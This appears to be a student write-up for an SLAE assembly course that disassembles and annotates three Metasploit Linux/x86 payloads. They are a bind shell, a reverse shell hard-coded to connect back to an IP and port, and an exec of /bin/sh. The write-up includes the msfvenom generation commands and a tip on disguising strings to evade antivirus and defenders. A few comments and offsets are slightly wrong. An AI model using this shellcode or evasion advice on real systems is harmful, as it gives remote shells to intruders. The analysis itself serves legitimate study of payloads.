\documentclass{article} 
\title{Analyzing MSF payloads}
\author{Marco Nappi} 
\usepackage{listings}
\usepackage{geometry}
\geometry{
	a4paper,
	total={170mm,257mm},
	left=20mm,
	top=20mm,
}
\usepackage{hyperref}
\hypersetup{
	colorlinks=true,
	linkcolor=blue,
	filecolor=magenta,
	urlcolor=blue,
}
\begin{document}
\maketitle
\section*{SLAE Assignment 5}
This is the Fifth SLAE assignment in which we have to analyze 3 different payload from The Msfvenom tool. We will analyze the Linux/86 format of those payload because that is the focus.
To study the following payloads we will use ndisasm:
\begin{itemize}
	\item Linux/x86/shell\_bind\_tcp 
	\item Linux/x86/shell\_reverse\_tcp
	\item Linux/x86/exec
\end{itemize}
\section*{Asm code tips}
The last question before starting to write the Asm code is :\\
How to call a syscall using Asm in Linux 86 ?\\
To call a syscall we have to work with the register like so:\\\\	
$\bullet$ In EAX we put the number of the syscall\\
$\bullet$ In EBX we put the first argument of the syscall\\
$\bullet$ In ECX we put the second argument of the syscall\\
$\bullet$ In EDX we put the third argument of the syscall\\
$\bullet$ In ESI we put the fourth argument of the syscall\\
$\bullet$ In EDI we put the fifth argument of the syscall\\
\\
What happens after a call instruction ?\\
If after a call instruction there is some data those are pushed onto the stack so we use the jump-call-pop technique to push the pointer of the data on the stack 
\newpage
\section*{linux/x86/shell\_bind\_tcp}
\subsection*{Cmd to create the code}
Msfvenom -p linux/x86/shell\_bind\_tcp  -a x86 --platform linux|ndisasm
\subsection*{ndisasm output}

\begin{lstlisting}[language={[x86masm]Assembler}]
00000000  31DB              xor ebx,ebx ; set to zero ebx
00000002  F7E3              mul ebx ; set edx and eax to zero
00000004  53                push ebx ; push 0 on the stack stands for IPPROTO_IP
00000005  43                inc ebx ; increase by one ebx 
00000006  53                push ebx ; push 1 on the stack stands for SOCK_STREAM
00000007  6A02              push byte +0x2 ; push 2 on the stack stands for PF_INET
00000009  89E1              mov ecx,esp ; moving in ecx the pointer to the struct created
0000000B  B066              mov al,0x66 ; set the syscall to be called sysscoket_call
0000000D  CD80              int 0x80 ; interrupt to let the syscall run
0000000F  5B                pop ebx ; pop 2 into ebx
00000010  5E                pop esi ; pop 2 into esi
00000011  52                push edx ; edx=0 so the it means the address will be 0.0.0.0
00000012  680200115C        push dword 0x5c110002 ; port + AF_INET
00000017  6A10              push byte +0x10 ; 16 decimal the length of address
00000019  51                push ecx ; pushes the address of the struct we need
0000001A  50                push eax ; socket fd pushed as needed
0000001B  89E1              mov ecx,esp ; move into ecx the pointer of 	
					;the struct needed for socket call
0000001D  6A66              push byte +0x66
0000001F  58                pop eax ;socketcall
00000020  CD80              int 0x80 ; interrupt to let the syscall run
00000022  894104            mov [ecx+0x4],eax ;
00000025  B304              mov bl,0x4 ; sys_listen
00000027  B066              mov al,0x66 ; sys_socketcall
00000029  CD80              int 0x80 ; interrupt to let the syscall run
0000002B  43                inc ebx ; ebx 4->5 that stands for sys_accept
0000002C  B066              mov al,0x66 ; sys_socketcall
0000002E  CD80              int 0x80 ; interrupt to let the syscall run
00000030  93                xchg eax,ebx ; saves the fd in ebx
00000031  59                pop ecx ; popping in ecx 2 , ecx is 
				    ;used as iterator for the loop 
00000032  6A3F              push byte +0x3f ;
00000034  58                pop eax ;setting the value for the syscall dup 
00000035  CD80              int 0x80 ; interupt to let the syscall run
00000037  49                dec ecx ; decreasing ecx 2->1->0
00000038  79F8              jns 0x32 ; Jumps on line 32 when SF=1 
0000003A  682F2F7368        push dword 0x68732f2f ; hs//
0000003F  682F62696E        push dword 0x6e69622f ; nib/
00000044  89E3              mov ebx,esp ; pointer to the command we want to run
00000046  50                push eax ; null terminator 
00000047  53                push ebx ; pushes the pointer to the string on the stack
00000048  89E1              mov ecx,esp ; saves the new stack pointer 
0000004A  B00B              mov al,0xb ; setting the syscall excve
0000004C  CD80              int 0x80 ; interupt to let the syscall run
\end{lstlisting}

\subsection*{lesson learned}
using ecx in combination with the dup2 syscall can help us to reduce the shellcode size.\\
Why?\\
Because we can both use ecx as iterator and as number of file descriptor , we need to run dup2 3 times and fd in linux are 0,1 and 2 .
\newpage
\section*{linux/x86/shell\_reverse\_tcp}
\subsection*{Cmd to create the code}
msfvenom -p linux/x86/shell\_reverse\_tcp  -a x86 --platform linux |ndisasm
\subsection*{ndisasm output}
\begin{lstlisting}[language={[x86masm]Assembler}]
00000000  31DB              xor ebx,ebx ; set to zero ebx
00000002  F7E3              mul ebx ; set edx and eax to zero
00000004  53                push ebx ; push 0 on the stack stands for IPPROTO_IP
00000005  43                inc ebx ; increase by one ebx 
00000006  53                push ebx ; push 1 on the stack stands for SOCK_STREAM
00000007  6A02              push byte +0x2 ; push 2 on the stack stands for PF_INET
00000009  89E1              mov ecx,esp ; moving in ecx the pointer to the struct created on the stuck
0000000B  B066              mov al,0x66 ; set the syscall to be called sysscoket_call
0000000D  CD80              int 0x80 ; interrupt to let the syscall run
0000000F  93                xchg eax,ebx ; moving in ebx the fd of the socket
00000010  59                pop ecx ; popping 2 in ecx 
					;( used as counter for the loop to run dup2 twice)
00000011  B03F              mov al,0x3f ; set the syscall for dup2
00000013  CD80              int 0x80 ; interrupt to let the syscall run
00000015  49                dec ecx ; decrementing ecx 2->1->0
00000016  79F9              jns 0x11 ; jump to 0x11 if the SF is not setted
00000018  68C0A82B89        push dword 0x892ba8c0 ; pushing the address
0000001D  680200115C        push dword 0x5c110002 ; pushing port plus 02->AF_INET
00000022  89E1              mov ecx,esp ;moving pointer of the socket struct into ecx
00000024  B066              mov al,0x66; setting sys_socketcall()
00000026  50                push eax
00000027  51                push ecx; pushing the struct adress
00000028  53                push ebx; pushing the fd of the socket
00000029  B303              mov bl,0x3 ; setting sys_connect
0000002B  89E1              mov ecx,esp
0000002D  CD80              int 0x80 ;interrupt to let the syscall run
0000002F  52                push edx ; pushes the null terminator on the stack edx=0
00000030  686E2F7368        push dword 0x68732f6e ; hs/n
00000035  682F2F6269        push dword 0x69622f2f ; ib//
0000003A  89E3              mov ebx,esp ; moving the pointer to the cmd //bin/sh
0000003C  52                push edx ; null terminator
0000003D  53                push ebx ; mo
0000003E  89E1              mov ecx,esp ; moving in ecx the pointer to the cmd //bin/sh
00000040  B00B              mov al,0xb ; set the excve syscall
00000042  CD80              int 0x80 ;interrupt to let the syscall run
\end{lstlisting}
\subsection*{lesson learn}
The xchg instruction can be used to make shorter our payload and could be used instead of zoring a register ,only if we have already a register set to 0 . Further more the xchg can be used instead of the mov instruction to store the return value off a syscall in a different register than EAX.
\newpage
\section*{linux/x86/exec}
\subsection*{Cmd to create the code}
msfvenom -p linux/x86/exec CMD=/bin/sh/ --platform linux -a x86 | ndisam
\subsection*{ndisasm output}
\begin{lstlisting}[language={[x86masm]Assembler}]
00000000  6A0B              push byte +0xb ;
00000002  58                pop eax ; set the syscall execve popping 0xb
00000003  99                cdq ; coping the sign value of eax into edx , 
				;basically sets edx to 0
00000004  52                push edx ; pushes the null terminator on the stack
00000005  66682D63          push word 0x632d ;push the string 'c-' onto the stack
00000009  89E7              mov edi,esp ; stores the pointer to the struct in edi
0000000B  682F736800        push dword 0x68732f ; hs/
00000010  682F62696E        push dword 0x6e69622f ; nib/
00000015  89E3              mov ebx,esp ; mov the pointer to /bin/sh in ebx
00000017  52                push edx ; pushes the null terminator
00000018  E809000000        call 0x26 ; call used to store /bin/sh/ on the top of stack
0000001D  2F                das ; use the instruction to store '/'
0000001E  62696E            bound ebp,[ecx+0x6e] ;use the instruction to store 'bin'
00000021  2F                das ; use the instruction to store '/'
00000022  7368              jnc 0x8c ; use the instruction to write 'sh'
00000024  2F                das ; use the instruction to store '/'
00000025  005753            add [edi+0x53],dl ; this instruction is decode wrong
00000028  89E1              mov ecx,esp ; stores the "/bin/sh -c" in ecx 2nd param
					; of the function
0000002A  CD80              int 0x80 ; interrupt to let the syscall run
\end{lstlisting}

\subsection*{corrected output}
\begin{lstlisting}[language={[x86masm]Assembler}]
00000000  6A0B              push byte +0xb ;
00000002  58                pop eax ; pop 0xb in eax the value for exec syscall
00000003  99                cdq ; copies the sign value of eax into edx 	
				; basically set edx to 0
00000004  52                push edx ; used as null terminator 
00000005  66682D63          push word 0x632d ; push "-c" on the stack
00000009  89E7              mov edi,esp ; saves a pointer to "-c" for later
0000000B  682F736800        push dword 0x68732f  ; hs/
00000010  682F62696E        push dword 0x6e69622f ; nib/
00000015  89E3              mov ebx,esp ;
00000017  52                push edx ; pushes the null terminator on the stack
00000018  E809000000        call 0x26 ;used to store the following data on the stack
0000001D  2F                das ; simply '/' but 2F is a valid opcode 
				;so is decoded as an instruction 
0000001E  62696E            bound ebp,[ecx+0x6e]; valid opcode but is used to store "bin" 
00000021  2F                das  ;simply '/' but 2F is a valid opcode 
				;so i decoded as an instruction 
00000022  7368              jnc 0x8c ; valid opcode but is used to store sh
00000024  2F                das  ;simply '/' but 2F is a valid opcode 
				;so is decoded as an instruction 
00000025  00 		    null byte ; null terminator for /bin/sh string
00000026  57       	    push edi ;push the pointer to "-c" on the stack
00000027  53       	    push ebx ;push /bin/sh on the stack
00000029  89 E1             mov  ecx, esp ; stores the "/bin/sh -c" in ecx 
					 ;2nd param of the function
0000002B  CD 80             int  0x80 ;soft interrupt to let the syscall run
\end{lstlisting}
\subsection*{Lesson Learn}
cdq instruction can be used to clear the EDX register if the sign's bit is equal to 0 , because it will overwrite each bit of EDX ,32 in total, with 0\\
We could hide our string like "/bin/sh" as  opcode that can confuse the AV or the blue team member that is reading our shellcode.
\\ ASCII Table is always your friend !!
\section*{Gitlab Repository}
Here it is the link to my SLAE repository:\\
\url{https://gitlab.com/mrcnpp/SLAE/-/tree/master/SLAE32}
\section*{References}
A good alternative to the man Cmd is this site:\\
\url{https://man7.org/linux/man-pages/man2}\\
Thanks to all guys of the "Assemblers County" who helped me 
\section*{SLAE Statement}
This blog post has been	created	for	completing the requirements of the	SecurityTube Linux Assembly	Expert certification:\\
\url{http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert}\\
Student ID: SLAE-1545  
\end{document}